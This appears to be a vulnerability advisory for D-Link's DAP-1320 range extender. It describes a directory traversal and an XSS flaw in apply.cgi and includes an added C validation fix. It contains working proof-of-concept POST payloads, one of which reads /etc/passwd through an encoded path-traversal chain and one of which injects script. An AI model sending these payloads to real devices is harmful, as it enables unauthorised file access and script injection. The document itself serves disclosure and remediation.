D-Link's DAP-1320 Wireless Range Extender suffers from both a
directory traversal and an XSS vulnerability on all firmware versions
(current version: 1.20B07).
---------------------------------------------------------------------------
Directory Traversal
CWE-22: Path Traversal
The POST param 'html_response_page' of apply.cgi suffers from a
directory traversal vulnerability.
The following example will display the contents of /etc/passwd:
http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D
HTTP/1.1
---------------------------------------------------------------------------
XSS
CWE-79: Cross Site Scripting
The POST param 'html_response_page' of apply.cgi suffers from an XSS
vulnerability.
Example:
http://<IP>/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded
POST
html_response_page=%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3E&login_name=Huggy&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=pop&tmp_log_pass_auth=goes&graph_code=joffrey&session_id=57687&gcode_base64=ZZTOPI%3D
HTTP/1.1
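
Both issues above come from the same unvalidated parameter, so one allow-list check on 'html_response_page' covers the traversal and the XSS case. The following is an added example, not D-Link's firmware code and not part of the original advisory; the function names, the 64-byte limit and the list of page extensions are assumptions.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Form-decode src into dst once ('+' is a space). Returns -1 on a malformed
 * escape, an encoded NUL byte, or a value too long for dst. */
static int form_decode(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    for (size_t i = 0; src[i] != '\0'; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c == '%') {
            if (!isxdigit((unsigned char)src[i + 1]) ||
                !isxdigit((unsigned char)src[i + 2]))
                return -1;
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            c = (unsigned char)strtoul(hex, NULL, 16);
            i += 2;
        } else if (c == '+') {
            c = ' ';
        }
        if (c == '\0' || o + 1 >= dstlen)
            return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 0;
}

/* Returns 1 only when the raw html_response_page value decodes to a bare page
 * name: [A-Za-z0-9_-]+ followed by one extension from the assumed list. */
int response_page_is_safe(const char *raw)
{
    static const char *const ext_ok[] = { ".asp", ".htm", ".html" }; /* assumed */
    char name[64];
    if (form_decode(raw, name, sizeof name) != 0)
        return 0;
    const char *dot = strrchr(name, '.');
    if (dot == NULL || dot == name)
        return 0;
    for (const char *p = name; p < dot; p++)
        if (!isalnum((unsigned char)*p) && *p != '_' && *p != '-')
            return 0; /* '/', '\\', '.', '<', '>', '"', '%' and spaces end here */
    for (size_t i = 0; i < sizeof ext_ok / sizeof ext_ok[0]; i++)
        if (strcmp(dot, ext_ok[i]) == 0)
            return 1;
    return 0;
}
```

The value is decoded exactly once before checking, so a double-encoded separator still contains '%' after decoding and is rejected.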
---------------------------------------------------------------------------
Vendor Link:
http://support.dlink.com/ProductInfo.aspx?m=DAP-1320
Research Contact: K Lovett